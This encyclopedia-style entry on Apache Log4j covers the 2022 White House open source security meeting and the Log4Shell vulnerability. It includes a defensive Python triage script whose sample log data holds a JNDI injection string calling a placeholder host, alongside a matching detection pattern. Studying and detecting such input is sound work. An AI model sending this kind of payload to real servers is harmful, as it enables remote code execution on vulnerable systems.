Developers: Apache Software Foundation (ASF)
Last Release Date: 2021/12/14
Technology: MDM - Master Data Management
2022: US White House brings together Microsoft, Google and IBM after detecting a critical vulnerability in Apache software
On January 13, 2022, the administration of US President Joe Biden held a meeting with the heads of large technology companies, federal agencies and non-profit organizations to discuss the security of open source software. The need for a conversation between IT businesses, key members of the open source community and the government became pressing after the discovery of a high-profile vulnerability in the Apache Log4j library, which triggered a huge wave of attacks on servers around the world.
The White House event was held as a video conference, in the format of a panel discussion in which every participant could speak rather than a presentation. It was attended by representatives of Amazon, IBM, Microsoft, Akamai, the Apache Software Foundation and the Linux Foundation, as well as the US Departments of Commerce, Defense, Energy and Homeland Security. The meeting was led by Anne Neuberger, the White House's chief adviser on cyber technology.
According to The Wall Street Journal, the meeting participants said that they focused on practical ways of working together in the public and private sectors to increase open source security standards, partly relying on the efforts of the community, including the development of the Open Source Security Foundation (OpenSSF, founded in 2020). The latter includes large banks, IT companies and research organizations.
"We believe that further work requires cooperation between companies and organizations that use and supply open source software," the Apache Software Foundation said after the conversation organized by the US presidential administration.
Several participants in the meeting also made statements welcoming the White House's attention to open source security, but warned about the insufficient security of such products.
"It is difficult to imagine a situation in which the government would take a very negative position and say: 'Well, we cannot trust open source software,' or treat open source as a scapegoat," said Akamai chief technology officer Robert Blumofe, who attended the meeting.
He said the participants discussed ways to support open source software that would not overload its developers but would actually help them, through tooling, educational and other initiatives.
Google proposed creating a kind of marketplace to match volunteers from companies with the open source projects that are most important to the market and most in need of support. Google itself expressed its readiness to provide resources for such work.
Casey Ellis, founder and chief technology officer of Bugcrowd (which develops a platform for white-hat hackers), said that small open source projects are often maintained by small groups of volunteers who work on them only from time to time. This poses a great threat to the security of such products, he said.
At the same time, the participants in the landmark meeting did not agree on any concrete steps aimed at solving the problem of open source software security. However, the White House intends to put forward concrete proposals in the coming days, as well as prepare a plan for the next meeting on this issue with the heads of large IT companies, it was reported on January 14, 2022.
On January 11, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) announced that it had not yet discovered serious destructive cyber attacks related to the Log4j vulnerabilities, but acknowledged their seriousness.
"The scale and potential impact of this problem make it incredibly serious," CISA director Jen Easterly told reporters, adding that the Log4j problem was the "most serious vulnerability" she had seen in her entire career.[1]
2021: Vulnerability discovered that allows remote execution of arbitrary code without authentication
The MaxPatrol VM vulnerability management system, the PT Network Attack Discovery deep traffic analysis system and the PT Application Firewall web application firewall identify a critical zero-day vulnerability in the Apache Log4j logging library, which is used by millions of Java-based applications and services, including enterprise software, cloud servers and computer games. This was reported by Positive Technologies on December 14, 2021. Since December 10, 2021, attackers have been actively scanning the network in search of vulnerable systems, and honeypots have been recording attack attempts.
A zero-day vulnerability was discovered in one of the most popular logging frameworks in the world, the Log4j library developed by the Apache Software Foundation. All versions of the library from 2.0-beta9 to 2.14.1 are affected. The vulnerability, called Log4Shell, allows attackers to remotely execute arbitrary code without authentication and seize full control over vulnerable servers.
CVE-2021-44228 has the maximum CVSS 3.0 severity score of 10. Log4Shell is distinguished by its ease of exploitation: getting a single line of text into the log through the application requires no special technical skills from attackers.
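As an added example (not from Positive Technologies or the Apache project), the following Python triage helper shows how the affected-version range stated above can be applied to a software inventory, the kind of automatic identification of vulnerable assets described further down, together with a literal check for the `${jndi:` lookup prefix in log lines. The inventory and log lines are constructed sample data.

```python
import re

# Affected range exactly as stated in the notice: 2.0-beta9 through 2.14.1 inclusive.
AFFECTED_LOW = "2.0-beta9"
AFFECTED_HIGH = "2.14.1"

# Accepts "2.14.1", "2.0", "2.0-beta9", "2.0-rc1" style version strings.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # a final release ranks above all of these


def version_key(version: str) -> tuple:
    """Turn a Log4j version string into a sortable tuple.
    Pre-releases such as 2.0-beta9 and 2.0-rc1 sort before the final 2.0."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    major, minor, patch, pre, pre_num = m.groups()
    rank = _PRE_RANK[pre.lower()] if pre else len(_PRE_RANK)
    return (int(major), int(minor), int(patch or 0), rank, int(pre_num or 0))


def is_affected(version: str) -> bool:
    """True when the version falls inside the stated 2.0-beta9..2.14.1 range."""
    return version_key(AFFECTED_LOW) <= version_key(version) <= version_key(AFFECTED_HIGH)


def triage_inventory(inventory: dict) -> list:
    """Return the hosts whose log4j-core version is in the affected range, sorted."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))


def find_jndi_lookup_attempts(lines: list) -> list:
    """Flag log lines carrying the literal ${jndi: lookup prefix (case-insensitive).
    This is a literal match only; it is a triage aid, not a full WAF rule."""
    return [ln for ln in lines if "${jndi:" in ln.lower()]


SAMPLE_INVENTORY = {  # constructed sample, hypothetical host names and versions
    "app-01": "2.14.1", "app-02": "2.15.0", "app-03": "2.0-beta9", "app-04": "2.0-beta8",
    "app-05": "2.0-rc1", "app-06": "2.17.1", "app-07": "2.13.3",
}
SAMPLE_LOG_LINES = [  # constructed access-log lines; example.invalid is a placeholder host
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://example.invalid/a}"',
]

if __name__ == "__main__":
    print("affected hosts:", triage_inventory(SAMPLE_INVENTORY))
    print("suspicious log lines:", find_jndi_lookup_attempts(SAMPLE_LOG_LINES))
```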
The Log4j library is part of most Apache network products and is also used in millions of enterprise applications and web services developed in Java to record error messages. According to the latest data, the cloud servers of Amazon, Apple, Baidu, Cloudflare, DiDi, Google, JD.com, Microsoft, Minecraft, NetEase, Steam, Tencent, Tesla, Twitter, VMware and thousands of other software vendors are exposed to the vulnerability. In addition, the framework is actively used in various open source projects, including Elasticsearch, Ghidra and Red Hat.
Since December 10, 2021, mass scanning of the network for systems vulnerable to Log4Shell has been recorded. The risk of exploitation increased significantly after the first PoC exploit was published on GitHub. According to Positive Technologies experts, in real attacks this vulnerability in Apache Log4j can be exploited in many ways, depending on the specific service. As a result, large organizations around the world, government websites and most of the Internet are at risk.
Positive Technologies products help detect this threat: three of them detect the Log4Shell vulnerability "out of the box," meaning that current users do not need to download anything additional. In particular, if the MaxPatrol VM knowledge base contains the updates dated December 10, 2021, vulnerable assets are identified automatically.
PT Application Firewall version 3.0 detects an exploitation attempt as SSTI (server-side template injection) and blocks it; version 4.0 additionally classifies it as a JNDI injection attempt.
Exploitation of Log4Shell can also be detected with PT NAD during network traffic analysis; for this, experts from the Positive Technologies Expert Security Center added a dedicated detection rule to the product.